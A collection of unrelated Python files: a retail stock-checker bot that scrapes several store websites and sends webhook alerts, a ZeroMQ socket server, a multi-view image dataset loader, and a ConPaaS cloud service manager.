ex.log.AppendText("[" + current_time + "] " + title + " in stock at Amazon - " + url + '\n')
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title + '\n')
stockdict.update({url: 'False'})
driver.quit()
class BH:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
#tree = html.fromstring(page.content)
#imgs = tree.xpath("//a[contains(@class,'wrapper')]")
#img_raw = {imgs[0].attrib}
#img = img_raw.__getattribute__(href)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if page.status_code == 200:
if "Add to Cart" in page.text:
print("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url)
slack_data = {
'username': "BH Photo Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bhphoto.png",
'content': "BH Photo Stock Alert: " + url,
'embeds': [{
'title': url,
'description': url + " in stock at BH Photo",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': "https://wiki.tripwireinteractive.com/images/4/47/Placeholder.png"
}
}]
}
ex.log.AppendText("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url + '\n')
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url + '\n')
stockdict.update({url: 'False'})
class BestBuy:
def __init__(self, sku, orig_url, hook):
self.sku = sku
self.hook = hook
webhook_url = webhook_dict[hook]
url = "https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C" + sku + "%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get"
headers2 = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
}
page = requests.get(url, headers=headers2)
link = "https://www.bestbuy.com/site/" + sku + ".p?skuId=" + sku
al = page.text
search_string = '"skuId":"' + sku + '","buttonState":"'
stock_status = al[al.find(search_string) + 33 : al.find('","displayText"')]
product_name = sku_dict.get(sku)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if stock_status == "SOLD_OUT":
print("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name + '\n')
stockdict.update({sku: 'False'})
elif stock_status == "CHECK_STORES":
print(product_name + " sold out @ BestBuy (check stores status)")
stockdict.update({sku: 'False'})
else:
if stock_status == "ADD_TO_CART":
print("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link + '\n')
#slack_data = {'content': "[" + current_time + "] " + product_name + " In Stock @ BestBuy " + link}
slack_data = {
'username': "BestBuy Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bestbuy.png",
'content': "BestBuy Stock Alert:",
'embeds': [{
'title': product_name,
'description': product_name + " in stock at BestBuy",
'url': link,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': bbimgdict.get(sku)
}
}]
}
if stockdict.get(orig_url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({orig_url: 'True'})
#print(stockdict)
class Gamestop:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36"')
options.add_argument("headless")
driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)
driver.get(url)
html = driver.page_source
status_raw = driver.find_element_by_xpath("//div[@class='add-to-cart-buttons']")
status_text = status_raw.text
title_raw = driver.find_element_by_xpath("//h1[@class='product-name h2']")
title_text = title_raw.text
title = title_text
image_raw = driver.find_element_by_xpath("//img[@class='mainImg ae-img']")
img = image_raw.get_attribute('src')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "ADD TO CART" in status_text:
print("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url + '\n')
slack_data = {
'username': "GameStop Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/gamestop.png",
'content': "GameStop Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at GameStop",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title + '\n')
stockdict.update({url: 'False'})
driver.quit()
class Target:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
al = page.text
tree = html.fromstring(page.content)
imgs = tree.xpath("//img[1]")
img_raw = str(imgs[0].attrib)
img = img_raw[20:-2]
title = al[al.find('"twitter":{"title":') + 20 : al.find('","card')]
#print(title)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
status = al[al.find('"availability_status":"') + 23 : al.find('","multichannel_options"')]
if status == "OUT_OF_STOCK":
print("[" + current_time + "] " + "Sold Out: (Target.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Target.com) " + title + '\n')
stockdict.update({url: 'False'})
elif status == "IN_STOCK":
print("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url + '\n')
slack_data = {
'username': "Target Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/target.png",
'content': "Target Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Target",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
#print(stockdict)
else:
print("[" + current_time + "] " + "UNKNOWN STATUS: (Target.com) " + title + " for status of: " + status)
class Walmart:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
tree = html.fromstring(page.content)
title_raw = tree.xpath("//h1[@class='prod-ProductTitle font-normal']")
title = title_raw[0].text
price_raw = tree.xpath("//span[@class='price display-inline-block arrange-fit price price--stylized']//span[@class='price-characteristic']")
price = price_raw[0].text
img_raw = tree.xpath("//meta[@property='og:image']/@content")
img = img_raw[0]
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if page.status_code == 200:
if "Add to cart" in page.text:
print("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url + '\n')
slack_data = {
'username': "Walmart Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/walmart.png",
'content': "Walmart Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Walmart for $" + price,
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Price:",
"value": "$" + price
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
if maxprice != 0:
if int(price) > maxprice:
print("in stock but not MSRP")
else:
try:
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
except:
print("Webhook sending failed. Invalid URL configured.")
else:
try:
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
except:
print("Webhook sending failed. Invalid URL configured.")
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title + '\n')
stockdict.update({url: 'False'})
def write_log(string):
try:
ex.log.AppendText((string + '\n'))
except:
print("Failed to output to log - Message: \n " + string)
def amzfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Amazon(url, hook)
except:
print("Some error ocurred parsing Amazon")
write_log("An error ocurred parsing Amazon")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def bestbuyfunc(sku, orig_url, hook, i):
print("Thread started -> " + sku)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
BestBuy(sku, orig_url, hook)
except:
print("Some error ocurred parsing BestBuy")
write_log("An error ocurred parsing BestBuy")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def gamestopfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Gamestop(url, hook)
except:
print("Some error ocurred parsing Gamestop")
write_log("An error ocurred parsing Gamestop")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def targetfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Target(url, hook)
except:
print("Some error ocurred parsing Target")
write_log("An error ocurred parsing Target")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def walmartfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
hook = ex.list.GetItemText(i, col=1)
Walmart(url, hook)
except:
print("Some error ocurred parsing WalMart")
write_log("An error ocurred parsing Walmart")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def bhfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
hook = ex.list.GetItemText(i, col=1)
BH(url, hook)
except:
print("Some error ocurred parsing BH Photo")
write_log("An error ocurred parsing BH Photo")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def RunJob(url, hook, i):
#Amazon URL Detection
if "amazon.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if "offer-listing" in url:
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Amazon URL detected using Webhook destination " + hook)
write_log(("Amazon URL detected -> " + hook))
t = Thread(target=amzfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
else:
print("Invalid Amazon link detected. Please use the Offer Listing page.")
except:
print("Error processing URL: " + url)
#Gamestop URL Detection
elif "gamestop.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Gamestop URL detected using Webhook destination " + hook)
write_log(("GameStop URL detected -> " + hook))
t = Thread(target=gamestopfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#BestBuy URL Detection
elif "bestbuy.com" in url:
try:
print("BestBuy URL detected using Webhook destination " + hook)
#ex.log.AppendText("BestBuy URL detected using Webhook destination " + hook + '\n')
parsed = urlparse.urlparse(url)
sku = parse_qs(parsed.query)['skuId']
sku = sku[0]
bestbuylist.append(sku)
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
}
page = requests.get(url, headers=headers)
al = page.text
tree = html.fromstring(page.content)
img = tree.xpath('//img[@class="primary-image"]/@src')[0]
title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]
sku_dict.update({sku: title})
bbdict.update({sku: hook})
bbimgdict.update({sku: img})
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("BestBuy URL detected using Webhook destination " + hook)
write_log(("BestBuy URL detected -> " + hook))
orig_url = url
t = Thread(target=bestbuyfunc, args=(sku, orig_url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#Target URL Detection
elif "target.com" in url:
try:
#targetlist.append(url)
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Target URL detected using Webhook destination " + hook)
write_log(("Target URL detected -> " + hook))
t = Thread(target=targetfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#Walmart URL Detection
elif "walmart.com" in url:
try:
#walmartlist.append(url)
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Walmart URL detected using Webhook destination " + hook)
write_log(("Walmart URL detected -> " + hook))
t = Thread(target=walmartfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#B&H Photo URL Detection
elif "bhphotovideo.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("BH Photo URL detected using Webhook destination " + hook)
write_log(("BH Photo URL detected -> " + hook))
t = Thread(target=bhfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
def main():
app = wx.App()
global ex
ex = GUI(None)
global stockdict
stockdict = {}
products = []
global bestbuylist
bestbuylist = []
global bbdict
bbdict = {}
global bbimgdict
bbimgdict = {}
global sku_dict
sku_dict = {}
global webhook_dict
webhook_dict = return_data("./data/webhooks.json")
global urldict
urldict = return_data("./data/products.json")
#set all URLs to be "out of stock" to begin
for url in urldict:
stockdict.update({url: 'False'})
for prod in urldict:
products.append((prod, urldict[prod], "Inactive"))
ex.list.InsertColumn(0, 'URL', width=540)
ex.list.InsertColumn(1, 'Webhook')
ex.list.SetColumnWidth(col=1, width=100)
ex.list.InsertColumn(2, 'Status')
idx = 0
for i in products:
index = ex.list.InsertItem(idx, i[0])
ex.list.SetItem(index, 1, i[1])
ex.list.SetItem(index, 2, i[2])
idx += 1
ex.Show()
app.MainLoop()
if __name__ == '__main__':
main()
|
Soundlocalization_socket_local.py
|
#
# Created on Sat Oct 09 2021
# Author: Owen Yip
# Mail: me@owenyip.com
#
import os, sys
import threading
import numpy as np
import time
import zmq
import json
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
class SERVER:
def __init__(self):
context = zmq.Context()
sl_port = "5454"
self.transmit_topic = "NAV_WALKER_POSE"
self.receive_topic = "NAV_SL_LOCATION"
self.transmit_socket = context.socket(zmq.PUB)
self.transmit_socket.bind("tcp://*:5455")
self.receive_socket = context.socket(zmq.SUB)
self.receive_socket.connect("tcp://127.0.0.1:%s" % sl_port)
self.receive_socket.setsockopt_string(zmq.SUBSCRIBE, self.receive_topic)
def transmit(self, message):
msg = "%s%s" % (self.transmit_topic, message)
self.transmit_socket.send_string(msg)
print("Sending data: %s" % msg)
def transmit_forever(self, message):
while True:
self.transmit(message)
time.sleep(1)
def receive(self):
message = self.receive_socket.recv_string()
return message.replace(self.receive_topic, "")
def receive_forever(self):
while True:
message = self.receive()
control = json.loads(message)
print("Received request: %s" % control)
if __name__ == "__main__":
msg = 'server to client'
server = SERVER()
p2 = threading.Thread(target=server.transmit_forever, args=((msg,)))
p1 = threading.Thread(target=server.receive_forever, args=())
p2.start()
p1.start()
|
input.py
|
import cv2
import random
import numpy as np
import time
import queue
import threading
import globals as g_
from concurrent.futures import ThreadPoolExecutor
from functools import partialmethod
W = H = 256
class Shape:
def __init__(self, list_file):
with open(list_file) as f:
self.label = int(f.readline())
self.V = int(f.readline())
view_files = [l.strip() for l in f.readlines()]
self.views = self._load_views(view_files, self.V)
self.done_mean = False
def _load_views(self, view_files, V):
views = []
selection = np.random.random_sample(V) > g_.RANDOM_DROP
for ind, f in enumerate(view_files):
try:
if g_.RANDOM_DROP == 0 or selection[ind] == True:
im = cv2.imread(f)
im = cv2.resize(im, (W, H))
else:
im = np.random.random_sample(W*H*3).reshape((W, H, 3)) * 256
                    im = im.astype(np.uint8)  # uint8 keeps the random views in [0, 255] like real images
except cv2.error:
print('im error: %s', f)
raise
# im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR) #BGR!!
assert im.shape == (W,H,3), 'BGR!'
im = im.astype('float32')
views.append(im)
views = np.asarray(views)
return views
def subtract_mean(self):
if not self.done_mean:
mean_bgr = (104., 116., 122.)
for i in range(3):
self.views[:,:,:,i] -= mean_bgr[i]
self.done_mean = True
def crop_center(self, size=(227,227)):
w, h = self.views.shape[1], self.views.shape[2]
wn, hn = size
left = int(w / 2 - wn / 2)
top = int(h / 2 - hn / 2)
right = left + wn
bottom = top + hn
self.views = self.views[:, left:right, top:bottom, :]
def crop_random(self, size=(227,227)):
w, h = self.views.shape[1], self.views.shape[2]
wn, hn = size
views = np.zeros((self.V, wn, hn, 3))
for i in range(self.V):
left = random.randrange(0, w - wn)
top = random.randrange(0, h - hn)
right = left + wn
bottom = top + hn
views[i, ...] = self.views[i, left:right, top:bottom, :]
self.views = views
class Dataset:
def __init__(self, listfiles, labels, subtract_mean, V):
self.listfiles = listfiles
self.labels = labels
self.shuffled = False
self.subtract_mean = subtract_mean
self.V = V
print('dataset inited')
print(' total size: %d' % len(listfiles))
def shuffle(self):
z = list(zip(self.listfiles, self.labels))
random.shuffle(z)
self.listfiles, self.labels = [list(l) for l in list(zip(*z))]
self.shuffled = True
def batches(self, batch_size, center_crop=True):
for x,y in self._batches_fast(self.listfiles, batch_size, center_crop):
yield x,y
def sample_batches(self, batch_size, n):
listfiles = random.sample(self.listfiles, n)
for x,y in self._batches_fast(listfiles, batch_size):
yield x,y
def _batches(self, listfiles, batch_size):
n = len(listfiles)
for i in range(0, n, batch_size):
starttime = time.time()
lists = listfiles[i : i+batch_size]
x = np.zeros((batch_size, self.V, g_.IMG_W, g_.IMG_H, 3))
y = np.zeros(batch_size)
for j,l in enumerate(lists):
s = Shape(l)
s.crop_center(size=(g_.IMG_W, g_.IMG_H))
if self.subtract_mean:
s.subtract_mean()
x[j, ...] = s.views
y[j] = s.label
print('load batch time:', time.time()-starttime, 'sec')
yield x, y
def _load_shape(self, listfile, center_crop=True):
s = Shape(listfile)
if center_crop == True:
s.crop_center(size=(g_.IMG_W, g_.IMG_H))
else:
s.crop_random(size=(g_.IMG_W, g_.IMG_H))
if self.subtract_mean:
s.subtract_mean()
return s
_random_load_shape = partialmethod(_load_shape, center_crop=False)
def _batches_fast(self, listfiles, batch_size, center_crop=True):
subtract_mean = self.subtract_mean
n = len(listfiles)
def load(listfiles, q, batch_size, center_crop):
n = len(listfiles)
with ThreadPoolExecutor(max_workers=16) as pool:
for i in range(0, n, batch_size):
sub = listfiles[i: i + batch_size] if i < n-1 else [listfiles[-1]]
if center_crop == True:
shapes = list(pool.map(self._load_shape, sub))
else:
shapes = list(pool.map(self._random_load_shape, sub))
views = np.array([s.views for s in shapes])
labels = np.array([s.label for s in shapes])
q.put((views, labels))
# indicate that I'm done
q.put(None)
# This must be larger than twice the batch_size
q = queue.Queue(maxsize=g_.INPUT_QUEUE_SIZE)
# background loading Shapes process
p = threading.Thread(target=load, args=(listfiles, q, batch_size, center_crop))
# daemon child is killed when parent exits
p.daemon = True
p.start()
x = np.zeros((batch_size, self.V, g_.IMG_W, g_.IMG_H, 3))
y = np.zeros(batch_size)
for i in range(0, n, batch_size):
starttime = time.time()
item = q.get()
if item is None:
break
x, y = item
# print 'load batch time:', time.time()-starttime, 'sec'
yield x, y
def size(self):
""" size of listfiles (if splitted, only count 'train', not 'val')"""
return len(self.listfiles)
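if __name__ == '__main__':
    # Minimal usage sketch with a hypothetical list file and label; the globals
    # module g_ is assumed to define IMG_W, IMG_H, RANDOM_DROP and INPUT_QUEUE_SIZE.
    listfiles = ['lists/airplane_0001.txt']
    labels = [0]
    dataset = Dataset(listfiles, labels, subtract_mean=True, V=12)
    dataset.shuffle()
    for x, y in dataset.batches(batch_size=1):
        print('batch views:', x.shape, 'labels:', y)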
|
manager.py
|
"""
Copyright (c) 2010-2012, Contrail consortium.
All rights reserved.
Redistribution and use in source and binary forms,
with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the
above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce
the above copyright notice, this list of
conditions and the following disclaimer in the
documentation and/or other materials provided
with the distribution.
3. Neither the name of the Contrail consortium nor the
names of its contributors may be used to endorse
or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
# TODO: as this file was created from a BLUEPRINT file,
# you may want to change ports, paths and/or methods (e.g. for hub)
# to meet your specific service/server needs
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.controller import Controller
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.core.log import create_logger
from conpaas.services.blueprint.agent import client
class BluePrintManager(BaseManager):
"""Manager class with the following exposed methods:
startup() -- POST
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
# Manager states
S_INIT = 'INIT' # manager initialized but not yet started
S_PROLOGUE = 'PROLOGUE' # manager is starting up
S_RUNNING = 'RUNNING' # manager is running
S_ADAPTING = 'ADAPTING' # manager is in a transient state - frontend will
# keep polling until manager out of transient state
S_EPILOGUE = 'EPILOGUE' # manager is shutting down
S_STOPPED = 'STOPPED' # manager stopped
S_ERROR = 'ERROR' # manager is in error state
# String template for error messages returned when performing actions in
# the wrong state
WRONG_STATE_MSG = "ERROR: cannot perform %(action)s in state %(curstate)s"
# String template for error messages returned when a required argument is
# missing
REQUIRED_ARG_MSG = "ERROR: %(arg)s is a required argument"
# String template for debugging messages logged on nodes creation
ACTION_REQUESTING_NODES = "requesting %(count)s nodes in %(action)s"
AGENT_PORT = 5555
def __init__(self, config_parser, **kwargs):
"""Initialize a BluePrint Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('blueprint')
self.state = self.S_INIT
@expose('POST')
def startup(self, kwargs):
"""Start the BluePrint service"""
self.logger.info('Manager starting up')
# Starting up the service makes sense only in the INIT or STOPPED
# states
if self.state != self.S_INIT and self.state != self.S_STOPPED:
vals = { 'curstate': self.state, 'action': 'startup' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
self.state = self.S_PROLOGUE
Thread(target=self._do_startup, args=[]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_startup(self):
"""Start up the service. The first node will be an agent running a
BluePrint Hub and a BluePrint Node."""
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT)
# Extend the nodes list with the newly created one
self.nodes += nodes
self.state = self.S_RUNNING
        except Exception as err:
self.logger.exception('_do_startup: Failed to start agent: %s' % err)
self.state = self.S_ERROR
@expose('POST')
def shutdown(self, kwargs):
"""Switch to EPILOGUE and call a thread to delete all nodes"""
# Shutdown only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'shutdown' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
self.state = self.S_EPILOGUE
Thread(target=self._do_shutdown, args=[]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_shutdown(self):
"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.nodes = [] # Not only delete the nodes, but clear the list too
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.update_context(dict(STRING='blueprint'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_add_nodes(self, count):
"""Add 'count' BluePrint Nodes to this deployment"""
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT)
# Startup agents
for node in node_instances:
client.create_node(node.ip, self.AGENT_PORT)
self.nodes += node_instances
self.state = self.S_RUNNING
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
